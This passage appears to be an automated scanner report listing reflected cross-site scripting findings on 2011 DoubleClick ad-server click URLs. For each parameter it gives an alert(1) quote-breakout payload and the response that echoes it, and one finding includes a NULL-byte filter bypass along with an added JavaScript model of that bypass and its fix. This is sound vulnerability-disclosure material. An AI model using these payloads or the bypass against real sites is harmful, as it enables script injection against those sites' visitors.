Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:08:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcgif = 'http://s0.2mdn.net/3126678/SLIM_Wipe_Katie_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7014%26avppid%3D ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf6"-alert(1)-"1c881d63b74 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7535
Date: Tue, 28 Jun 2011 02:09:27 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26TFN%3D8664972899%26Campaign%3D222230000010575"); var fscUrl = url; var ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb3ed"-alert(1)-"c4998f35407 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7500
Date: Tue, 28 Jun 2011 02:06:43 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41496831%26%26TFN%3D8664 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac37f"-alert(1)-"bb4e6cdabfe was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7515 Date: Tue, 28 Jun 2011 02:06:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 81/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26 ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0059830"-alert(1)-"d8f92070b1e was submitted in the _pm parameter. This input was echoed as 59830"-alert(1)-"d8f92070b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter inspects only the bytes before the %00, while the application strips the NULL byte and processes everything after it, which is why the echoed value above has lost the %00 but kept the quotes and the alert(1) call. You should fix the actual vulnerability within the application code (encode the value for the JavaScript string context it lands in, and reject requests whose decoded parameters contain NULL bytes), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Treat the WAF as defence in depth only: the other findings on this page show the same sink reached without any bypass at all.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7327 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:10:01 GMT Expires: Tue, 28 Jun 2011 02:10:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3B41422311/41440098/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=https://quote.allstate.com?quote=PQ&cid=BAC-Xplus1&att=61840000;41496760&&TFN=8664972899&Campaign=222230000010575"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
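The following is an added example, not code from the ad server, the scan report or any WAF product. It models the NULL-byte bypass described in the finding above: a filter that behaves like a C string routine and stops reading at the first NUL, in front of an application that drops the NUL and echoes the rest. The blocking pattern, the function names and the two-stage pipeline are assumptions made for the example; the payload is the one from the finding.

```javascript
// Added example: why "%00" slips a blocked payload past a native-code filter,
// and what the fixed request handling looks like. Hypothetical model only.

// A filter rule of the shape the scanner's payload has: a quote, then an
// optional sign, then an identifier being called.
const BLOCK_PATTERN = /["'][-+]?\w+\(/;

// URL-decode one parameter value; %00 becomes a literal NUL character.
// (decodeURIComponent throws on malformed %-sequences; callers should treat
// that as a rejected request too.)
function urlDecode(raw) {
  return decodeURIComponent(raw);
}

// Emulates a filter that copies the decoded value into a NUL-terminated C
// string before inspecting it: everything after the first NUL is invisible.
function nativeStyleFilterBlocks(decoded) {
  const nul = decoded.indexOf("\0");
  const visible = nul === -1 ? decoded : decoded.slice(0, nul);
  return BLOCK_PATTERN.test(visible);
}

// Emulates the application: NUL bytes are dropped and the remainder is echoed
// into the script, which is exactly what the response above shows.
function applicationEchoes(decoded) {
  return decoded.replace(/\0/g, "");
}

// Vulnerable pipeline: truncated filter view, then unencoded echo.
function handleVulnerable(raw) {
  const decoded = urlDecode(raw);
  if (nativeStyleFilterBlocks(decoded)) return { blocked: true, echoed: null, reason: "pattern" };
  return { blocked: false, echoed: applicationEchoes(decoded), reason: null };
}

// Fixed pipeline: canonicalise first and reject NUL outright, run the filter
// over the complete value, and encode the echo for its context regardless of
// what the filter said. The encoding is the actual fix; the filter is defence
// in depth.
function handleFixed(raw) {
  const decoded = urlDecode(raw);
  if (decoded.includes("\0")) return { blocked: true, echoed: null, reason: "NUL byte" };
  if (BLOCK_PATTERN.test(decoded)) return { blocked: true, echoed: null, reason: "pattern" };
  return { blocked: false, echoed: encodeURIComponent(decoded), reason: null };
}

// Constructed inputs: the finding's _pm payload with and without the leading
// %00, and a benign value.
const PAYLOAD_PLAIN = "59830%22-alert(1)-%22d8f92070b1e";
const PAYLOAD_NUL = "%0059830%22-alert(1)-%22d8f92070b1e";
const BENIGN = "97956";

function demo() {
  return {
    vulnerablePlain: handleVulnerable(PAYLOAD_PLAIN), // blocked by the filter
    vulnerableNul: handleVulnerable(PAYLOAD_NUL),     // slips through, echoed
    fixedNul: handleFixed(PAYLOAD_NUL),               // rejected: NUL byte
    fixedPlain: handleFixed(PAYLOAD_PLAIN),           // rejected: pattern
    fixedBenign: handleFixed(BENIGN),                 // passes, encoded echo
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The order of operations is the whole lesson: decode and canonicalise once, reject anything that cannot legitimately appear in the parameter (a NUL byte never can), and only then inspect and encode. Any filter that runs on a different representation of the value than the one the application ultimately uses will eventually be bypassed.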
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1864"-alert(1)-"ddf059404d1 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7373 Date: Tue, 28 Jun 2011 02:10:24 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41883805%26%26TFN%3D8664972899%26Campaign%3D222230000010575"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1beaa'-alert(1)-'9e65c854819 was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33f5'-alert(1)-'4dfa122d9d8 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe36'-alert(1)-'583b7cb77ec was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708c8'-alert(1)-'68bf9185ea8 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88478'-alert(1)-'cd68f8a5b was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22a18'-alert(1)-'99b4bb5bd72 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9639'-alert(1)-'96a1af39904 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdeb'-alert(1)-'000ca2f821b was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d6cb'-alert(1)-'6f19826f6fc was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df183'-alert(1)-'09e6c884d7f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b56'-alert(1)-'2689d224978 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15154'-alert(1)-'d86740d32ed was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:38 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var target = '_blank'; var dcbgcolor = '' ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ba80'-alert(1)-'b278081406c was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:30:06 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blank'; var dcb ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df45'-alert(1)-'3a47738f921 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:29:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blan ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf8f'-alert(1)-'f8a532e7701 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:19 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ://s0.2mdn.net/2279893/build_osa_300x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590be'-alert(1)-'10e500e253b was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:28 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 93/DBVault_300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var target = '_blank'; var dcb ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22438'-alert(1)-'30165b56046 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:09 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'http://s0.2mdn.net/2279893/DBVault_300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var t ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7318'-alert(1)-'1d7b10ff8e1 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:30:16 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blank'; var dcbgcolor = ' ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f697a'-alert(1)-'2dcff89fe8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4640 Date: Tue, 28 Jun 2011 01:30:25 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... cwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2279893/300x250.swf ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90f62'-alert(1)-'94227e935c8 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:47 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 0x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = '_blank'; var dcbgcolor = ''; var d ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b90'-alert(1)-'b8a211ccb10 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4829 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 01:30:26 GMT Expires: Tue, 28 Jun 2011 01:30:26 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10http://fb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx?acmpgn=111_X1_300x250_feel_X1FEELA&src=X1FEELA'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/22 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff824'-alert(1)-'e40b80e5cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:00 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ; var dcgif = 'http://s0.2mdn.net/2279893/build_osa_300x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUI ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6436'-alert(1)-'d8cc99c698b was submitted in the _a parameter. This input was echoed unmodified in the application's response.
